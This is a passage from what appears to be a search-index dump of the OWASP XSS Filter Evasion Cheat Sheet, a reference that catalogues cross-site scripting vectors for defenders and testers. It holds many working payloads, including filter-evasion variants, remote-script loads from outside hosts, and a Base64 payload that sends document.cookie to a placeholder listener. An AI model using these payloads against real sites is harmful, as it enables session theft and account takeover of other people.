  75. onProgress() (attacker would use this as a flash movie was loading)
  76. onPropertyChange() (user or attacker would need to change an element property)
  77. onReadyStateChange() (user or attacker would need to change an element property)
  78. onRedo() (user went forward in undo transaction history)
  79. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
  80. onReset() (user or attacker resets a form)
  81. onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  82. onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  83. onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  84. onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
  85. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
  86. onRowsEnter() (user or attacker would need to change a row in a data source)
  87. onRowExit() (user or attacker would need to change a row in a data source)
  88. onRowDelete() (user or attacker would need to delete a row in a data source)
  89. onRowInserted() (user or attacker would need to insert a row in a data source)
  90. onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
  91. onSeek() (the onseek event fires when the timeline is set to play in any direction other than forward)
  92. onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  93. onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  94. onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  95. onStart() (fires at the beginning of each marquee loop)
  96. onStop() (user would need to press the stop button or leave the webpage)
  97. onStorage() (storage area changed)
  98. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
  99. onSubmit() (requires attacker or user submits a form)
  100. onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
  101. onTrackChange() (user or attacker changes track in a playList)
  102. onUndo() (user went backward in undo transaction history)
  103. onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
  104. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
  105. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#bgsound","title":"BGSOUND","text":"

<BGSOUND SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-includes","title":"& JavaScript includes","text":"

<BR\u00a0SIZE=\"&{alert('XSS')}\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-sheet","title":"STYLE sheet","text":"

<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet","title":"Remote style sheet","text":"

Using something as simple as a remote style sheet, you can include your XSS, as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that JavaScript is included. Note: all of these remote style sheet examples use the body tag, so the vector won't work unless there is some content on the page other than the vector itself; you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

<LINK\u00a0REL=\"stylesheet\"\u00a0HREF=\"http://xss.rocks/xss.css\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-2","title":"Remote style sheet part 2","text":"

This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag. A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-3","title":"Remote style sheet part 3","text":"

This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616, setting a link header is not part of the HTTP1.1 spec; however, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different from the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector runs the JavaScript, which is not supported in Firefox:

<META\u00a0HTTP-EQUIV=\"Link\"\u00a0Content=\"<http://xss.rocks/xss.css>;\u00a0REL=stylesheet\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-4","title":"Remote style sheet part 4","text":"

This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

<STYLE>BODY{-moz-binding:url(\"http://xss.rocks/xssmoz.xml#xss\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tags-with-broken-up-javascript-for-xss","title":"STYLE Tags with Broken-up JavaScript for XSS","text":"

This XSS at times sends IE into an infinite loop of alerts:

<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-attribute-using-a-comment-to-break-up-expression","title":"STYLE Attribute using a Comment to Break-up Expression","text":"

Created by Roman Ivanov

<IMG\u00a0STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-style-with-expression","title":"IMG STYLE with Expression","text":"

This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart; like the above, this can send IE into a loop:

exp/*<A\u00a0STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-older-versions-of-netscape-only","title":"STYLE Tag (Older versions of Netscape only)","text":"

<STYLE\u00a0TYPE=\"text/javascript\">alert('XSS');</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background-image","title":"STYLE Tag using Background-image","text":"

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A\u00a0CLASS=XSS></A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background","title":"STYLE Tag using Background","text":"

<STYLE\u00a0type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <STYLE type=\"text/css\">BODY{background:url(\"<javascript:alert>('XSS')\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#anonymous-html-with-style-attribute","title":"Anonymous HTML with STYLE Attribute","text":"

IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:

<XSS\u00a0STYLE=\"xss:expression(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#local-htc-file","title":"Local htc File","text":"

This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

<XSS STYLE=\"behavior: url(xss.htc);\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#us-ascii-encoding","title":"US-ASCII Encoding","text":"

US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful for evading web application firewalls than for evading server side filters. Apache Tomcat is the only known server that transmits in US-ASCII encoding.

\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta","title":"META","text":"

The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-using-data","title":"META using Data","text":"

This uses the data: directive URL scheme. It is nice because it doesn't visibly contain the word SCRIPT or the JavaScript directive, since it utilizes base64 encoding. Please see RFC 2397 for more details on encoding your own. You can also use the XSS calculator if you just want to encode raw HTML or JavaScript, as it has a Base64 encoding method:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=data:text/html\u00a0base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
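
If you want to encode your own payload, the browser's built-in btoa function is enough for an ASCII snippet; a quick sketch (note that the example string above also encodes a trailing newline, so its output differs by one character group):

// Base64-encode an HTML snippet for use in a data: URL\nconst payload = btoa(\"<script>alert('XSS')</script>\");\nconsole.log('data:text/html;base64,' + payload);\n// data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\n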

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-with-additional-url-parameter","title":"META with Additional URL Parameter","text":"

If the target website attempts to see if the URL contains http:// at the beginning, you can evade it with the following technique (submitted by Moritz Naumann):

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;\u00a0URL=http://;URL=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe","title":"IFRAME","text":"

If iframes are allowed there are a lot of other XSS problems as well:

<IFRAME\u00a0SRC=\"javascript:alert('XSS');\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe-event-based","title":"IFRAME Event Based","text":"

IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)

<IFRAME\u00a0SRC=#\u00a0onmouseover=\"alert(document.cookie)\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#frame","title":"FRAME","text":"

Frames have the same sorts of XSS problems as iframes:

<FRAMESET><FRAME\u00a0SRC=\"javascript:alert('XSS');\"></FRAMESET>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#table","title":"TABLE","text":"

<TABLE\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#td","title":"TD","text":"

Just like above, TDs are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:

<TABLE><TD\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div","title":"DIV","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image","title":"DIV Background-image","text":"

<DIV\u00a0STYLE=\"background-image:\u00a0url(javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-with-unicoded-xss-exploit","title":"DIV Background-image with Unicoded XSS Exploit","text":"

This has been modified slightly to obfuscate the URL parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV\u00a0STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-plus-extra-characters","title":"DIV Background-image Plus Extra Characters","text":"

Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV\u00a0STYLE=\"background-image:\u00a0url(\u0001javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-expression","title":"DIV Expression","text":"

A variant of this was effective against a real world cross site scripting filter using a newline between the colon and \"expression\":

<DIV\u00a0STYLE=\"width:\u00a0expression(alert('XSS'));\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#downlevel-hidden-block","title":"Downlevel-Hidden Block","text":"

This only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode. Some websites consider anything inside a comment block to be safe and therefore do not remove it, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<!--[if\u00a0gte\u00a0IE\u00a04]>\n<SCRIPT>alert('XSS');</SCRIPT>\n<![endif]-->\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base-tag","title":"BASE Tag","text":"

Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg rather than full paths. If the path includes a leading forward slash like /images/image.jpg you can remove one slash from this vector (as long as there are two to begin the comment this will work):

<BASE\u00a0HREF=\"javascript:alert('XSS');//\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#object-tag","title":"OBJECT Tag","text":"

If they allow objects, you can also inject virus payloads to infect the users, etc. (the same goes for the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

<OBJECT\u00a0TYPE=\"text/x-scriptlet\"\u00a0DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-a-flash-movie-that-contains-xss","title":"EMBED a Flash Movie That Contains XSS","text":"

Click here for a demo: ~~http://ha.ckers.org/xss.swf~~

<EMBED\u00a0SRC=\"http://ha.ckers.org/xss.swf\"\u00a0AllowScriptAccess=\"always\"></EMBED>

If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-svg-which-contains-xss-vector","title":"EMBED SVG Which Contains XSS Vector","text":"

This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

<EMBED\u00a0SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH\u00a0A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv\u00a0MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs\u00a0aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\u00a0IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh\u00a0TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"\u00a0type=\"image/svg+xml\"\u00a0AllowScriptAccess=\"always\"></EMBED>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#using-actionscript-inside-flash-for-obfuscation","title":"Using ActionScript Inside Flash for Obfuscation","text":"
a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"alert('XSS');\\\")\"; \neval(a+b+c+d);\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xml-data-island-with-cdata-obfuscation","title":"XML Data Island with CDATA Obfuscation","text":"

This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode - vector found by Sec Consult while auditing Yahoo:

<XML\u00a0ID=\"xss\"><I><B><IMG\u00a0SRC=\"javas<!--\u00a0-->cript:alert('XSS')\"></B></I></XML> \n<SPAN\u00a0DATASRC=\"#xss\"\u00a0DATAFLD=\"B\"\u00a0DATAFORMATAS=\"HTML\"></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#locally-hosted-xml-with-embedded-javascript-that-is-generated-using-an-xml-data-island","title":"Locally hosted XML with embedded JavaScript that is generated using an XML data island","text":"

This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<XML\u00a0SRC=\"xsstest.xml\"\u00a0ID=I></XML>  \n<SPAN\u00a0DATASRC=#I\u00a0DATAFLD=C\u00a0DATAFORMATAS=HTML></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#htmltime-in-xml","title":"HTML+TIME in XML","text":"

This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

<HTML><BODY>\n<?xml:namespace\u00a0prefix=\"t\"\u00a0ns=\"urn:schemas-microsoft-com:time\">\n<?import\u00a0namespace=\"t\"\u00a0implementation=\"#default#time2\">\n<t:set\u00a0attributeName=\"innerHTML\"\u00a0to=\"XSS<SCRIPT\u00a0DEFER>alert(\"XSS\")</SCRIPT>\">\n</BODY></HTML>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assuming-you-can-only-fit-in-a-few-characters-and-it-filters-against-js","title":"Assuming you can only fit in a few characters and it filters against .js","text":"

You can rename your JavaScript file to an image as an XSS vector:

<SCRIPT\u00a0SRC=\"http://xss.rocks/xss.jpg\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ssi-server-side-includes","title":"SSI (Server Side Includes)","text":"

This XSS vector requires SSI to be installed on the server. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

<!--#exec\u00a0cmd=\"/bin/echo\u00a0'<SCR'\"--><!--#exec\u00a0cmd=\"/bin/echo\u00a0'IPT\u00a0SRC=http://xss.rocks/xss.js></SCRIPT>'\"-->

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#php","title":"PHP","text":"

This XSS vector requires PHP to be installed on the server. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<?\u00a0echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>');\u00a0?>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands","title":"IMG Embedded Commands","text":"

This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

<IMG\u00a0SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands-part-ii","title":"IMG Embedded Commands part II","text":"

This is scarier because there are absolutely no identifiers that make it look suspicious, other than the fact that it is not hosted on your own domain. The vector uses a 302 or 304 redirect (others work too) to redirect the image back to a command. So a normal <IMG SRC=\"httx://badguy.com/a.jpg\"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

Redirect\u00a0302\u00a0/a.jpg\u00a0http://victimsite.com/admin.asp&deleteuser

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#cookie-manipulation","title":"Cookie Manipulation","text":"

Admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

<META\u00a0HTTP-EQUIV=\"Set-Cookie\"\u00a0Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#utf-7-encoding","title":"UTF-7 Encoding","text":"

If the page that the XSS resides on doesn't provide a page charset header, or if the browser is set to UTF-7 encoding, it can be exploited with the following (thanks to Roman Ivanov for this one). You don't need the charset statement if the user's browser is set to auto-detect and there are no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode. This does not work in any modern browser without changing the encoding type, which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script:

<HEAD><META\u00a0HTTP-EQUIV=\"CONTENT-TYPE\"\u00a0CONTENT=\"text/html;\u00a0charset=UTF-7\">\u00a0</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-using-html-quote-encapsulation","title":"XSS Using HTML Quote Encapsulation","text":"

This was tested in IE; your mileage may vary. For performing XSS on sites that allow <SCRIPT> but don't allow <SCRIPT SRC... by way of a regex filter /\\<script\\[^\\>\\]+src/i:

<SCRIPT\u00a0a=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

For performing XSS on sites that allow <SCRIPT> but don't allow \\<script src... by way of a regex filter /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i (this is an important one, because I've seen this regex in the wild):

<SCRIPT\u00a0=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i:

<SCRIPT\u00a0a=\">\"\u00a0''\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Yet another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i. I know I said I wasn't going to discuss mitigation techniques, but the only thing I've seen work for this XSS example, if you still want to allow <SCRIPT> tags but not remote scripts, is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):

<SCRIPT\u00a0\"a='>'\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

And one last XSS attack to evade, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i using grave accents (again, doesn't work in Firefox):

<SCRIPT\u00a0a=>SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:

<SCRIPT\u00a0a=\">'>\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-string-evasion","title":"URL String Evasion","text":"

Assuming http://www.google.com/ is programmatically disallowed:

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ip-versus-hostname","title":"IP Versus Hostname","text":"

<A\u00a0HREF=\"http://66.102.7.147/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-encoding","title":"URL Encoding","text":"

<A\u00a0HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dword-encoding","title":"DWORD Encoding","text":"

Note: there are other variations of DWORD encoding - see the IP Obfuscation calculator for more details:

<A\u00a0HREF=\"http://1113982867/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hex-encoding","title":"Hex Encoding","text":"

The total size of each number allowed is somewhere in the neighborhood of 240 total characters, as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex octet is not required:

<A\u00a0HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#octal-encoding","title":"Octal Encoding","text":"

Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:

<A\u00a0HREF=\"http://0102.0146.0007.00000223/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base64-encoding","title":"Base64 Encoding","text":"

<img\u00a0onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\">
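
For reference, the Base64 string in this payload decodes to a simple cookie-exfiltrating redirect (listernIP is a placeholder carried over from the original payload); you can verify it in a browser console:

atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU=');\n// 'document.location=\"http://listernIP/\"+document.cookie'\n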

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#mixed-encoding","title":"Mixed Encoding","text":"

Let's mix and match base encoding and throw in some tabs and newlines (why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

<A\u00a0HREF=\"h \ntt\u00a0\u00a0p://6   6.000146.0x7.147/\">XSS</A>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-bypass","title":"Protocol Resolution Bypass","text":"

// translates to http:// which saves a few more bytes. This is really handy when space is an issue too (two fewer characters can go a long way) and can easily bypass a regex like (ht|f)tp(s)?:// (thanks to Ozh for part of this one). You can also change the // to \\\\\\\\. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.

<A\u00a0HREF=\"//www.google.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-1","title":"Google \"feeling lucky\" part 1","text":"

Firefox uses Google's \"feeling lucky\" function to redirect the user to any keywords you type in. So if your exploitable page is the top result for some random keyword, you can use that feature against any Firefox user. This uses Firefox's keyword: protocol. You can concatenate several keywords by using something like keyword:XSS+RSnake for instance. This no longer works within Firefox as of 2.0.

<A\u00a0HREF=\"//google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-2","title":"Google \"feeling lucky\" part 2","text":"

This uses a very tiny trick that appears to work in Firefox only, because of its implementation of the \"feeling lucky\" function. Unlike the next one, this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:

<A\u00a0HREF=\"http://ha.ckers.org@google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-3","title":"Google \"feeling lucky\" part 3","text":"

This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the \"feeling lucky\" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case \"google\"):

<A\u00a0HREF=\"http://google:ha.ckers.org\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#removing-cnames","title":"Removing CNAMEs","text":"

When combined with the above URL, removing www. will save an additional 4 bytes, for a total byte savings of 9 for servers that have this set up properly:

<A\u00a0HREF=\"http://google.com/\">XSS</A>

Extra dot for absolute DNS:

<A\u00a0HREF=\"http://www.google.com./\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-link-location","title":"JavaScript Link Location","text":"

<A\u00a0HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-replace-as-attack-vector","title":"Content Replace as Attack Vector","text":"

Assuming http://www.google.com/ is programmatically replaced with nothing: I actually used a similar attack vector against several separate real world XSS filters by using the conversion filter itself to help create the attack vector (i.e. java&\\#x09;script: was converted into java script:, which renders in IE, Netscape 8.1+ in secure site mode and Opera):

<A\u00a0HREF=\"http://www.google.com/ogle.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assisting-xss-with-http-parameter-pollution","title":"Assisting XSS with HTTP Parameter Pollution","text":"

Assume a content sharing flow on a web site is implemented as shown below. There is a \"Content\" page which includes some content provided by users, and this page also includes a link to a \"Share\" page which lets a user choose their favorite social sharing platform to share it on. Developers HTML encoded the \"title\" parameter in the \"Content\" page to protect against XSS, but for some reason they didn't URL encode this parameter to prevent HTTP Parameter Pollution. Finally, they decided that since content_type's value is a constant and will always be an integer, they didn't need to encode or validate content_type in the \"Share\" page.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-source-code","title":"Content Page Source Code","text":"

<a href=\"/Share?content_type=1&title=<%=Encode.forHtmlAttribute(untrusted content title)%>\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-source-code","title":"Share Page Source Code","text":"
<script>\nvar contentType = <%=Request.getParameter(\"content_type\")%>;\nvar title = \"<%=Encode.forJavaScript(request.getParameter(\"title\"))%>\";\n...\n//some user agreement and sending to server logic might be here\n...\n</script>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-output","title":"Content Page Output","text":"

